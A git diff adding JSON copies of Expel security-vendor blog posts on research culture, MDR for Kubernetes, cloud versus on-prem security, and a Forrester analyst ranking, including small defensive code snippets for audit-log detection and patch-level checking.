watch as well. Conclusion I know changing culture is hard and one meeting a week likely won\u2019t change anything. Coming to Expel, I had the benefit of defining a new culture (vs. changing an existing one). That said, here are a few ideas that might help in your innovation journey. Consider over communicating research status. Go to weekly engineering planning or sprint meetings. Make sure they know what you\u2019re working on and make it clear to engineering that nothing will get dropped in their lap. Emphasize that bringing something to production will be a collaborative effort. Require people responsible for experiments meet with engineering to understand code coverage and code style guidelines. Delivering your results with unit tests that meet code coverage requirements and style guidelines is a great way to show you respect engineering. Have engineers pair up with researchers (and vice versa). It will help each team build a healthy respect for what each other brings to the table. A weekly meeting to discuss new public research or internal research is a good first step to improving visibility. As you build trust, you can move to a more formal collaborative process but starting out with a meeting to discuss ideas and results is a good first step." 
+} \ No newline at end of file diff --git a/why-mdr-for-kubernetes-is-great-news-for-your-org.json b/why-mdr-for-kubernetes-is-great-news-for-your-org.json new file mode 100644 index 0000000000000000000000000000000000000000..ddf5d983aed1004b32ea5e377e7cf21c43baafa7 --- /dev/null +++ b/why-mdr-for-kubernetes-is-great-news-for-your-org.json @@ -0,0 +1,6 @@ +{ + "title": "Why MDR for Kubernetes is great news for your org", + "url": "https://expel.com/blog/why-mdr-for-kubernetes-is-great-news-for-your-org/", + "date": "Feb 15, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG Why MDR for Kubernetes is great news for your org Security operations \u00b7 3 MIN READ \u00b7 DAN WHALEN \u00b7 FEB 15, 2023 \u00b7 TAGS: Cloud security / MDR The potential for Kubernetes is huge, and the challenges facing early adopters are, too. We announced the first-to-market MDR for Kubernetes offering on Monday, and we\u2019d like to share some key considerations for your organization. We recently detailed the rapid growth of Kubernetes and container environments and walked you through what our customers see as their biggest challenges. Today let\u2019s talk about how managed detection and response (MDR) for Kubernetes (k8s) makes the future a brighter place for organizations that rely on in-house application development. For starters, MDR for Kubernetes helps orgs secure operations across every attack surface. It removes blind spots for the security team, arms the DevOps team to handle remediation, and lets developers do what they do best\u2014build applications that propel the business. MDR for Kubernetes provides insights across three core layers of Kubernetes applications: Configuration: More than half of organizations using Kubernetes found at least one misconfiguration in the past year, and failure to get ahead of the problem opens the door for attackers. MDR for Kubernetes identifies cluster misconfigurations and references the Center for Internet Security (CIS) best practices benchmark to recommend enhancements, increasing your security team\u2019s resilience. Control plane: No matter how far along you are on your journey, MDR for Kubernetes translates complexity into clarity by: \u25cb Integrating with cloud k8s infrastructures, like Amazon Elastic Kubernetes Service (EKS) and Google Kubernetes Engine (GKE); \u25cb Analyzing audit logs; applying custom detection logic to alert on malicious or interesting activity; and \u25cb Providing clear remediation guidance. Run-time security: Bring-your-own-tech models maximize return on investment (ROI). MDR for Kubernetes can integrate with a broad portfolio of run-time container security vendors to provide the answers you need for the tech you already use. MDR for Kubernetes also aligns to the MITRE ATT&CK framework, helping your SecOps team quickly remediate and build resilience for the future. Expel-authored detections learn and adapt based on activity in your environment, keeping you ahead of threats. You\u2019ll develop your own insights and best practices to track k8s security posture over time, and you won\u2019t be flying without a net: a security operations center (SOC) is on hand with 24\u00d77 triage and support. Plus, MDR for Kubernetes generates deeper awareness across your cloud infrastructure and drives more remediation recommendations where it matters most to your business. Secure the business MDR for Kubernetes helps orgs remove their security blind spots by cultivating insight across the entire cloud attack surface. 
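Part of that insight comes from the custom detection logic over audit logs mentioned in the control plane bullet above. As a rough illustration (not a description of Expel's actual detections), here is a minimal sketch that flags two commonly watched control-plane events: an exec into a pod and the creation of a cluster-admin binding. The field names follow the standard audit.k8s.io Event schema; everything else is made up for the example.

def suspicious_k8s_audit_events(events):
    # Yield a short finding for each audit-log entry worth an analyst's attention.
    for event in events:
        obj = event.get("objectRef", {})
        user = event.get("user", {}).get("username", "unknown")
        # Someone opened an interactive shell inside a pod.
        if (event.get("verb") == "create"
                and obj.get("resource") == "pods"
                and obj.get("subresource") == "exec"):
            yield f"pod exec by {user} in {obj.get('namespace')}/{obj.get('name')}"
        # Someone bound a subject to the cluster-admin role.
        if (event.get("verb") == "create"
                and obj.get("resource") == "clusterrolebindings"
                and event.get("requestObject", {}).get("roleRef", {}).get("name") == "cluster-admin"):
            yield f"cluster-admin binding created by {user}"

sample = [{
    "verb": "create",
    "user": {"username": "dev@example.com"},
    "objectRef": {"resource": "pods", "subresource": "exec",
                  "namespace": "prod", "name": "api-7d4f"},
}]
print(list(suspicious_k8s_audit_events(sample)))

Real detections layer in allow-lists, severity, and correlation with runtime signals, but the shape is the same: parse the audit stream, apply rules, and surface findings for triage.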
Security teams get important detection and response capabilities without causing friction for developers, letting them focus on building apps that matter to the business. Specifically, orgs can monitor and secure k8s across control plane, configuration, and container runtime security layers. Continuous monitoring of event logs, security alerts, and configuration details demystifies the complexity of Kubernetes, providing actionable security findings and recommendations to improve security posture over time. Improve ROI Any new technology investment must pass the ROI test. The great news here is that MDR for Kubernetes boosts return by working with your existing infrastructure. This means no matter where you are on your security journey in Kubernetes, MDR for Kubernetes can provide detection and response capabilities without requiring additional investment. And importantly, as you mature, its capabilities grow with you. CISOs and their teams quickly discover that enhanced visibility into the Kubernetes environment improves security results. They gain complete coverage across cloud infrastructure\u2014and with our new offering, it\u2019s all in the Expel WorkbenchTM platform\u2014and eliminate silos between DevOps and security, accelerating the business. Enable the business Security is often viewed as an inhibitor to business performance\u2014a cost center and point of friction. According to Red Hat, 55% of organizations have had to delay application deployment due to security concerns . With MDR for Kubernetes, organizations can continue to ship software with the added confidence that continuous security monitoring provides. Security teams get important visibility and insight, DevOps teams spend less time chasing noisy security alarms, and developers are enabled to do what they do best\u2014build what the business needs. Doing this at scale requires deep visibility, effective detection and response capabilities, and an ability to anticipate and address risks in Kubernetes before they result in business impact. Stay tuned for more k8s insights and resources. In the meantime, have a look here (and see what one customer architect says about why his org is happy to be aboard\u2026)" +} \ No newline at end of file diff --git a/why-the-cloud-is-probably-more-secure-than-your-on-prem.json b/why-the-cloud-is-probably-more-secure-than-your-on-prem.json new file mode 100644 index 0000000000000000000000000000000000000000..9a7042bd2a0847872f59a08a0d7e45b726fe412f --- /dev/null +++ b/why-the-cloud-is-probably-more-secure-than-your-on-prem.json @@ -0,0 +1,6 @@ +{ + "title": "Why the cloud is probably more secure than your on-prem ...", + "url": "https://expel.com/blog/why-cloud-probably-more-secure-than-on-prem-environment/", + "date": "Dec 17, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Why the cloud is probably more secure than your on-prem environment Security operations \u00b7 8 MIN READ \u00b7 ANDREW PRITCHETT \u00b7 DEC 17, 2019 \u00b7 TAGS: Cloud security / Planning / SOC Cloud this, cloud that\u2014the cloud has sure become the buzzword in IT, dev ops, and cybersecurity, hasn\u2019t it? According to Gartner, \u201cBy 2022, up to 60% of organizations will use an external service provider\u2019s cloud-managed service offering, which is double the percentage of organizations from 2018.\u201d 1 However, there are still plenty of cloud skeptics out there, wondering whether all of those who have gone before them are further on the path to demise\u2014from a security standpoint, that is. 
We believe the skeptics can rest easy. Cloud service providers (CSP) know that their profitability and reputation depend on their ability to maintain security for customer data. Therefore, security is a focus for all the CSPs, and they\u2019ve each made significant investments in physical security and hiring security experts. Is Data More Secure On-Premise? One reason that some of us struggle with putting data in the cloud is that we have a warm and fuzzy feeling about having our data physically close. We believe that if the data is in our own data centers\u2014at the end of the hallway\u2014then it\u2019s somehow more secure. The reality is that the physical location of the data has little to do with its security. What affects security most is access and control. If we\u2019re honest with ourselves, how many times have we walked past the data center to find the door propped open with a box fan? How many times have we seen an unescorted visitor roaming that same hallway looking for the restroom? We have a human tendency to become comfortable in our own surroundings, but when we become comfortable, we become complacent. This is why incident responders find abandoned vendor access points in on-premise data centers on the regular. On-Premise vs. Cloud Security Here are five reasons why your data might just be safer in the cloud. Reason #1: Physical Access Unlike most of the environments we\u2019ve all worked in, CSPs have incredible standards for physical access controls. If you don\u2019t believe me, check out some of the data center tours that are posted on YouTube . CSPs exercise security defense in layers, starting with having very restricted access to the places where customers\u2019 data is stored. Authorized employees must pass through security gates and fences, security guards, and surveillance cameras. The buildings are designed with mantraps and limited ingress and egress points and are also equipped with biometric scanners. Additionally, anytime an employee has to perform any kind of maintenance within the data center, the work is rigorously audited. Those employees even have to have proprietary hardware and chips in their badges or other devices in order to be authenticated and allowed inside the data center. If somehow a bad actor were to thwart all of these controls and enter the data center\u2014which is pretty unlikely\u2014your data is still protected by additional layers of security. CSPs protect your data with anonymity, encryption, and replication. In addition to using several layers of encryption for data at rest (either AES256 or AES128), CSPs also distribute each customer\u2019s data across multiple computers. 2 Here is a snippet from Google\u2019s website that explains in more detail how they protect your data within their data centers: \u201cRather than storing each user\u2019s data on a single machine or set of machines, we distribute all data\u2014including our own\u2014across many computers in different locations. We then chunk and replicate the data over multiple systems to avoid a single point of failure. We name these data chunks randomly, as an extra measure of security, making them unreadable to the human eye.\u201d 3 The TL;DR: Most businesses couldn\u2019t achieve this level of physical security on their own, given the sheer amount of resources you\u2019d need to do it, like real estate, personnel, and technology. Reason #2: Resiliency An important aspect of physical data security that\u2019s often neglected is resiliency. 
When I say resiliency, I mean that when you store data somewhere, you expect that when you need it again, you can go back and it\u2019ll still be there as you left it. CSPs know that business data is often mission-critical so they invest resources to offer their customers consistent reliability. Objects are stored redundantly on multiple devices across multiple facilities by CSPs, no interaction from the customer required. For example, Amazon Web Services (AWS) states that they design their redundancy for Amazon S3 to sustain the concurrent loss of data in two facilities. 4 What reliability does this represent? To put in perspective, in the last month, according to Cloud Harmony Amazon S3 had 100 percent availability across all 18 regions globally with zero minutes of recorded downtime. Google Cloud Storage reported a total of 3.88 minutes of downtime from two of their 26 regions and Microsoft Azure Cloud Storage reported a total of 48.13 minutes from only one of their 36 regions. Because none of the CSPs reported multiple concurrent data center outages, most users wouldn\u2019t have noticed there was an outage. Can your IT department guarantee that you will have nearly 100 percent availability and reliability? Most companies probably have some level of redundancy at maybe one other site and perhaps a set of tapes stored elsewhere that they could access if things really went sideways. But the reality is that backups and archives take time to put back into production, and you\u2019ll probably experience some data loss in the delta between when the backup was last written and when it is put back into production. The redundancy and data arrays offered by CSPs allow real-time, seamless continuity. Additionally, customers have the ability to automate additional redundancy across other regions and countries to accommodate for regional catastrophic events, such as hurricanes, earthquakes, or other natural disasters. Unless your company is already a global operation with offices around the world, your IT department likely can\u2019t achieve this level of redundancy. Reason #3: Significant Investment in Security Expertise In determining the security of data, we often evaluate two things: physical access and virtual access. I mentioned a few reasons why CSPs can provide better physical access controls, but there are some ways that CSPs can offer better virtual access controls, too. According to Microsoft, the company has a \u201cteam of more than 3,500 global cybersecurity experts that work together to help safeguard your business assets and data in Azure.\u201d 5 Their cybersecurity team alone is larger than the employee size of most businesses in the United States. It\u2019s a luxury for most companies to have two or three people on their staff who focus on cybersecurity. The reality is that most companies hire a bunch of developers and engineers for production, a small staff for IT and the help desk, perhaps an information security officer, and maybe someone on the IT team gets some extra security or incident response training (I know, I know\u2026 it\u2019s not just you who feels this way!). With all of the cybersecurity expertise at their disposal, CSPs can make sure that advanced security features are built into every product and service to keep data protected at every layer. 
These cybersecurity teams include security engineers, security architects, security analysts and incident responders, data scientists, penetration testers, vulnerability engineers, code reviewers, quality assurance, and compliance auditors and specialized feature development teams\u2014and their single focus is on providing and improving security. Reason #4: Development of Best-in-Class Access control Systems Because of the vast security expertise they have on staff, CSPs have the ability to develop best-in-class authentication and access control systems. By now you\u2019ve probably seen the Login with Google button on some of your favorite websites and thought, \u201cThat\u2019s odd\u2026 this isn\u2019t even a Google website.\u201d Or perhaps you\u2019ve seen \u201c Log in with Facebook \u201d or \u201c Log in with GitHub \u201d. Sure, the site you\u2019re on might not be owned by Google or the others, but many companies have come to realize that it\u2019s difficult to continually stay updated on the latest attacks against authentication systems. Storing passwords is difficult and potentially risky. Keeping up with the latest multi-factor services is a constant sprint, and striking a balance between easy password reset functionalities and not giving the wrong person access to protected data is difficult to get right. CSPs have the expertise and the resources to stay on top of all of these concerns and deliver best-in-class control systems. These control systems include the secure management of passwords and keypairs, multi-factor authentication services, mitigating controls assigned to password resets, protection from brute force and malicious login attempts, key vaults, conditional access policies (geolocation, trusted devices/clients, trusted countries/regions, IP ranges), role-based access control, automated DDoS defenses, firewalls/VPC controls, secure VPN protocols, audit logging, and alerting. All of these systems are closely integrated, tested, and audited by CSPs on a continual basis. It would take a large team of developers and security engineers to even begin to replicate these control systems on-premise, and that doesn\u2019t even take into account the additional maintenance and testing required to support and validate these systems. That said, just because CSPs do a great job protecting their own infrastructure doesn\u2019t mean that once you put your data in the cloud, you can wipe your hands clean of all things security. CSPs are responsible for protecting the global infrastructures that run all of the cloud services: the hardware, software, networking, and facilities that run all of the cloud platform services offered by the provider. As the customer, you\u2019re responsible for the security of your data and the resources you create in the cloud. That includes protecting the confidentiality, integrity, and availability of your data and maintaining any compliance requirements for your workloads, whether you use the controls provided by your provider or you bring your own. Reason #5: Vulnerability and Patch Management CSPs have entire teams of people solely devoted to detecting vulnerabilities and conducting patch management. These teams scan for software vulnerabilities using a combination of commercially available and purpose-built tools. They also conduct intensive automated and manual penetration testing, software security reviews, and external audits. These teams are dedicated to finding vulnerabilities before the attackers do. 
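To give a feel for the kind of check those dedicated teams run continuously, here is a deliberately tiny sketch of version-based vulnerability checking. It is illustrative only (the package names and versions are made up), not any vendor's scanner, but it shows why the work never ends: the advisory list changes constantly and every fleet has stragglers.

def parse_version(version):
    # Turn "4.2.10" into (4, 2, 10) so versions compare numerically.
    return tuple(int(part) for part in version.split("."))

def find_unpatched(installed, minimum_fixed):
    # Report packages still below the version that shipped the fix.
    findings = []
    for package, version in installed.items():
        fixed = minimum_fixed.get(package)
        if fixed and parse_version(version) < parse_version(fixed):
            findings.append(f"{package} {version} is below fixed version {fixed}")
    return findings

# Hypothetical inventory and advisory data.
installed = {"openssl": "1.0.2", "smbclient": "4.5.9"}
minimum_fixed = {"openssl": "1.1.1", "smbclient": "4.6.4"}
print(find_unpatched(installed, minimum_fixed))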
For the average company, the IT Manager is the vulnerability scanner and auditor, and they play that role in addition to looking after all their other duties and responsibilities. The IT Manager may get lucky and have some funding at the end of the year to put toward a third-party assessment or penetration test. It\u2019s then the responsibility of the IT Manager to make sure that all of the system owners are following up with the recommendations and patchwork suggestions made by those third parties. The reality is that this kind of work can be exhausting for small teams, especially when the IT team is already wearing many hats. That\u2019s why it often falls through the cracks. Think about how many organizations fell victim in May 2017 when WannaCry ransomware used the EternalBlue vulnerability to spread itself. Microsoft announced the vulnerability on March 14, 2017, in security bulletin MS17-010; however, two months later, millions of systems remained unpatched. 6 Security: Still A Shared Responsibility Notice that I talked about \u201cwhy the public cloud can be more secure\u2026\u201d and not \u201cwhy the cloud is more secure\u2026.\u201d Sure, CSPs have a great culture of security. They\u2019ve built many features and services to make it possible for you to experience data security, but you\u2019ve got to take the initiative to enable the security controls they\u2019re offering. If you don\u2019t take the time to learn about the security features and controls at your disposal and you don\u2019t turn them on, they won\u2019t do you any good. For example, multi-factor authentication and conditional access policies are great features but they aren\u2019t automatically configured or enforced\u2014you\u2019ve got to do a little bit of the legwork here. Most cloud providers offer security best practice documents or security checklists . These are a helpful starting point to learn about some of the security features and controls available to you. Remember, you aren\u2019t their first customer, meaning that the CSPs know their own services better than anyone and they know what other customers experienced when they haven\u2019t followed security best practices with their services. When you sign up with a CSP, they will guide you on what to do. Take the time to learn about the security features and controls that are available. And use them. Whether you stick with on-premise solutions or migrate to the cloud, Expel offers a managed security and detection response system with multiple integrations to endpoint, SIEM, and cloud software systems. Contact us today to see how we can help you make your system more secure. 1: Gartner Press Release \u201cGartner Forecasts Worldwide Public Cloud Revenue to Grow 17% in 2020,\u201d 13 November 2019. 
https://www.gartner.com/en/newsroom/press-releases/2019-11-13-gartner-forecasts-worldwide-public-cloud-revenue-to-grow-17-percent-in-2020 2: Encryption at rest in Google Cloud https://cloud.google.com/security/encryption/default-encryption 3: Data and Security https://www.google.com/about/datacenters/data-security/ 4: Data protection in Amazon S3 https://docs.aws.amazon.com/AmazonS3/latest/userguide/DataDurability.html 5: Strengthen your security posture with Azure https://azure.microsoft.com/en-us/overview/security/ 6: Microsoft Security Bulletin MS17-010 \u2013 Critical https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010" +} \ No newline at end of file diff --git a/wow-they-really-like-us.json b/wow-they-really-like-us.json new file mode 100644 index 0000000000000000000000000000000000000000..0dd89570c5349f40476309c46e8e4a4f9e0e9a49 --- /dev/null +++ b/wow-they-really-like-us.json @@ -0,0 +1,6 @@ +{ + "title": "Wow, they really like us", + "url": "https://expel.com/blog/they-really-like-us/", + "date": "Mar 24, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Wow, they really like us Expel insider \u00b7 1 MIN READ \u00b7 DAVE MERKEL \u00b7 MAR 24, 2021 \u00b7 TAGS: Company news / MDR You have to be at least a little confident to take a flying leap and start a company \u2026 especially if you\u2019re thinking of approaching investors to support you. If you don\u2019t believe in yourself, how can you convince others to put their money into your idea? Unless you\u2019re cynical and manipulative, but \u2026 I digress. It started with a tweet Five years ago, we set out to be anything but that security vendor. No red in the logo, no fear in the marketing and a ban on stupid phrases like \u201cmarket leading\u201d when you have, like, five customers. We set out to build something our customers could actually love, that creates space so they can spend their time on their priorities and passions. Managed security as an industry hadn\u2019t delivered on those promises. We hoped to change that. Did we think we could do it? I don\u2019t know how confident I was in myself and my co-founders alone. We were three guys with 10 Microsoft PowerPoint slides flying from meeting to meeting with investors. But the team we put together? We were confident they could do it. And they did. How do we know that? Our customers tell us all the time. Just out: Q1 2021 Forrester Wave\u2122 Report It\u2019s pretty cool when someone who spends their time understanding our market, day in and day out, agrees that our crew and what they do for our customers is, in fact, awesome. Forrester just published their report entitled The Forrester Wave\u2122: Managed Detection and Response, Q1 2021 . It is, to my knowledge, the only analyst report on the managed detection and response (MDR) market that provides comparative rankings at this time. See that dot in the top right? Yeah. That\u2019s my crew. They did that. I\u2019m feeling something right now. I believe the word is \u201cchuffed.\u201d Today\u2019s a pretty good day. Want to check it out? You can download your copy of the report here . (Don\u2019t worry \u2013 we\u2019re picking up the tab. You can grab a free copy using our link.)" +} \ No newline at end of file